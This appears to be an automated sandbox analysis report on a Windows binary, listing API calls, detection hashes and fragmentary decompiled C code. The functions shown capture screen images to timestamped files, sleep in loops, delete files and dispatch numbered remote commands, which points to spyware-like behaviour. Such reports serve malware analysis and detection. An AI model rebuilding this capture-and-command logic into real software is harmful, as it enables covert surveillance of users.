                                                                                  • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                  • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                  • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,0041C0C8,Function_0001B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                                                                  • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1042780377-3785015651
                                                                                • Opcode ID: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                                                                • Opcode Fuzzy Hash: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410B1B, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 187sleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410B20
                                                                                • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                                                                • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                                                                • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                                                                • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                                                                  • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                                                                  • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                                                                  • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                                                                  • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                                                                  • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                                                                  • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                                                                  • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                                                                  • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                                                                • atoi.MSVCRT ref: 00410DA2
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                                                                • atoi.MSVCRT ref: 00410DD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@Sleepatoi$?length@?$basic_string@CreateD@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupTimeswprintf
                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 628183228-3790400642
                                                                                • Opcode ID: a69d4cdc855c6144f30bba46eeaefe78faf24bc517be1be6c48fa41dadb81de4
                                                                                • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                                                                • Opcode Fuzzy Hash: a69d4cdc855c6144f30bba46eeaefe78faf24bc517be1be6c48fa41dadb81de4
                                                                                • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410F04, Relevance: 54.4, APIs: 36, Instructions: 407COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 21%
                                                                                			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
				char _v20;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				char _v168;
				char _v184;
				char _v200;
				char _v216;
				void* _t69;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				char* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				char* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				char* _t101;
				void* _t103;
				void* _t104;
				void* _t106;
				char* _t110;
				void* _t112;
				char* _t118;
				char* _t119;
				char* _t120;
				intOrPtr* _t123;
				void* _t125;
				void* _t127;
				char* _t130;
				char* _t135;
				char* _t136;
				char* _t137;
				intOrPtr _t139;
				void* _t230;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t241;
				void* _t242;
				void* _t247;
				void* _t248;
				void* _t253;
				void* _t254;
				void* _t264;
				void* _t265;

				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_t139 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
				_t233 = _t230 + 0x24;
				_t69 = _t139 - 1;
				if(_t69 == 0) {
					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
					E004020C2(0x41c130);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
					L26:
					_t74 = E004017DD( &_v20);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t74;
				}
				_t75 = _t69 - 1;
				if(_t75 == 0) {
					_t76 = E004119AD( &_v20, 0);
					_t235 = _t233 - 0x10;
					_push(_t76);
					E00412881(_t76);
					_t78 = E00411700(_t235);
					_t236 = _t235 + 0x10;
					__eflags = _t78;
					if(_t78 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x80);
						L14:
						E004020C2(0x41c130);
						goto L26;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t83 =  &_v184;
					_push(_t83);
					L00414140();
					_push(_t83);
					L00414140();
					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
					L23:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L26;
				}
				_t85 = _t75 - 1;
				if(_t85 == 0) {
					_t86 = E004119AD( &_v20, 0);
					_t241 = _t233 - 0x10;
					_push(_t86);
					E00412881(_t86);
					_t88 = E00411760(_t241);
					_t242 = _t241 + 0x10;
					__eflags = _t88;
					if(_t88 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x81);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t92 =  &_v152;
					_push(_t92);
					L00414140();
					_push(_t92);
					L00414140();
					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
					goto L23;
				}
				_t94 = _t85 - 1;
				if(_t94 == 0) {
					_t95 = E004119AD( &_v20, 0);
					_t247 = _t233 - 0x10;
					_push(_t95);
					E00412881(_t95);
					_t97 = E00411859(_t247);
					_t248 = _t247 + 0x10;
					__eflags = _t97;
					if(_t97 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x82);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t101 =  &_v120;
					_push(_t101);
					L00414140();
					_push(_t101);
					L00414140();
					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
					goto L23;
				}
				_t103 = _t94 - 1;
				if(_t103 == 0) {
					_t104 = E004119AD( &_v20, 0);
					_t253 = _t233 - 0x10;
					_push(_t104);
					E00412881(_t104);
					_t106 = E004118C0(_t253);
					_t254 = _t253 + 0x10;
					__eflags = _t106;
					if(_t106 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x83);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t110 =  &_v88;
					_push(_t110);
					L00414140();
					_push(_t110);
					L00414140();
					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
					goto L23;
				}
				_t112 = _t103 - 1;
				if(_t112 == 0) {
					E00412881(_t113);
					_v24 = E004117C7(_t233 - 0x10);
					_t118 =  &_v72;
					L00414140();
					_t119 =  &_v136;
					L00414140();
					_t120 =  &_v56;
					L00414140();
					L0041417C();
					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L23;
				}
				if(_t112 != 1) {
					goto L26;
				}
				_t123 = E004119AD( &_v20, 2);
				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_push( *_t123);
				_t125 = E004119AD( &_v20, 0);
				_t264 = _t233 - 0x10;
				_push(_t125);
				_push(_t264);
				E00412881(_t125);
				_t127 = E00411927();
				_t265 = _t264 + 0x14;
				if(_t127 == 0) {
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t130 =  &_v104;
					_push(_t130);
					L00414140();
					_push(_t130);
					L00414140();
					E004020C2(0x41c130, 0x84, _t265 - 0x10);
				} else {
					_t135 =  &_v200;
					L00414140();
					_t136 =  &_v168;
					L00414140();
					_t137 =  &_v40;
					L00414140();
					L00414140();
					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				goto L23;
			}



























































                                                                                0x00410f16
                                                                                0x00410f1c
                                                                                0x00410f2e
                                                                                0x00410f38
                                                                                0x00410f41
                                                                                0x00410f52
                                                                                0x00410f61
                                                                                0x00410f6b
                                                                                0x00410f73
                                                                                0x00410f76
                                                                                0x00410f77
                                                                                0x00411394
                                                                                0x004113a2
                                                                                0x004113ad
                                                                                0x004113b3
                                                                                0x004113b6
                                                                                0x004113be
                                                                                0x004113c8
                                                                                0x004113c8
                                                                                0x00410f7d
                                                                                0x00410f7e
                                                                                0x004112f5
                                                                                0x004112fa
                                                                                0x004112ff
                                                                                0x00411301
                                                                                0x00411308
                                                                                0x0041130d
                                                                                0x00411310
                                                                                0x00411312
                                                                                0x00411371
                                                                                0x00411377
                                                                                0x004111ce
                                                                                0x004111d3
                                                                                0x00000000
                                                                                0x004111d3
                                                                                0x00411326
                                                                                0x00411327
                                                                                0x0041132e
                                                                                0x0041132f
                                                                                0x00411335
                                                                                0x00411336
                                                                                0x0041133e
                                                                                0x00411340
                                                                                0x0041134f
                                                                                0x0041135a
                                                                                0x0041135a
                                                                                0x00000000
                                                                                0x0041135a
                                                                                0x00410f84
                                                                                0x00410f85
                                                                                0x00411268
                                                                                0x0041126d
                                                                                0x00411272
                                                                                0x00411274
                                                                                0x0041127b
                                                                                0x00411280
                                                                                0x00411283
                                                                                0x00411285
                                                                                0x004112e1
                                                                                0x004112e7
                                                                                0x00000000
                                                                                0x004112e7
                                                                                0x00411299
                                                                                0x0041129a
                                                                                0x004112a1
                                                                                0x004112a2
                                                                                0x004112a8
                                                                                0x004112a9
                                                                                0x004112b1
                                                                                0x004112b3
                                                                                0x004112c2
                                                                                0x00000000
                                                                                0x004112c7
                                                                                0x00410f8b
                                                                                0x00410f8c
                                                                                0x004111e1
                                                                                0x004111e6
                                                                                0x004111eb
                                                                                0x004111ed
                                                                                0x004111f4
                                                                                0x004111f9
                                                                                0x004111fc
                                                                                0x004111fe
                                                                                0x00411254
                                                                                0x0041125a
                                                                                0x00000000
                                                                                0x0041125a
                                                                                0x00411212
                                                                                0x00411213
                                                                                0x0041121a
                                                                                0x0041121b
                                                                                0x0041121e
                                                                                0x0041121f
                                                                                0x00411227
                                                                                0x00411229
                                                                                0x00411238
                                                                                0x00000000
                                                                                0x0041123d
                                                                                0x00410f92
                                                                                0x00410f93
                                                                                0x00411150
                                                                                0x00411155
                                                                                0x0041115a
                                                                                0x0041115c
                                                                                0x00411163
                                                                                0x00411168
                                                                                0x0041116b
                                                                                0x0041116d
                                                                                0x004111c3
                                                                                0x004111c9
                                                                                0x00000000
                                                                                0x004111c9
                                                                                0x00411181
                                                                                0x00411182
                                                                                0x00411189
                                                                                0x0041118a
                                                                                0x0041118d
                                                                                0x0041118e
                                                                                0x00411196
                                                                                0x00411198
                                                                                0x004111a7
                                                                                0x00000000
                                                                                0x004111ac
                                                                                0x00410f99
                                                                                0x00410f9a
                                                                                0x004110c5
                                                                                0x004110d1
                                                                                0x004110f0
                                                                                0x004110f4
                                                                                0x004110fd
                                                                                0x00411104
                                                                                0x0041110d
                                                                                0x00411111
                                                                                0x0041111b
                                                                                0x0041112a
                                                                                0x00411132
                                                                                0x0041113e
                                                                                0x00000000
                                                                                0x00411144
                                                                                0x00410fa1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410fad
                                                                                0x00410fb4
                                                                                0x00410fbf
                                                                                0x00410fc1
                                                                                0x00410fc6
                                                                                0x00410fcb
                                                                                0x00410fcc
                                                                                0x00410fcd
                                                                                0x00410fd4
                                                                                0x00410fd9
                                                                                0x00410fde
                                                                                0x0041107f
                                                                                0x00411080
                                                                                0x00411087
                                                                                0x00411088
                                                                                0x0041108b
                                                                                0x0041108c
                                                                                0x00411094
                                                                                0x00411096
                                                                                0x004110a8
                                                                                0x00410fe4
                                                                                0x0041100b
                                                                                0x00411012
                                                                                0x0041101b
                                                                                0x00411022
                                                                                0x0041102b
                                                                                0x0041102f
                                                                                0x00411039
                                                                                0x00411048
                                                                                0x00411050
                                                                                0x0041105c
                                                                                0x00411062
                                                                                0x00000000

                                                                                APIs
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,00018C06), ref: 00410F2E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
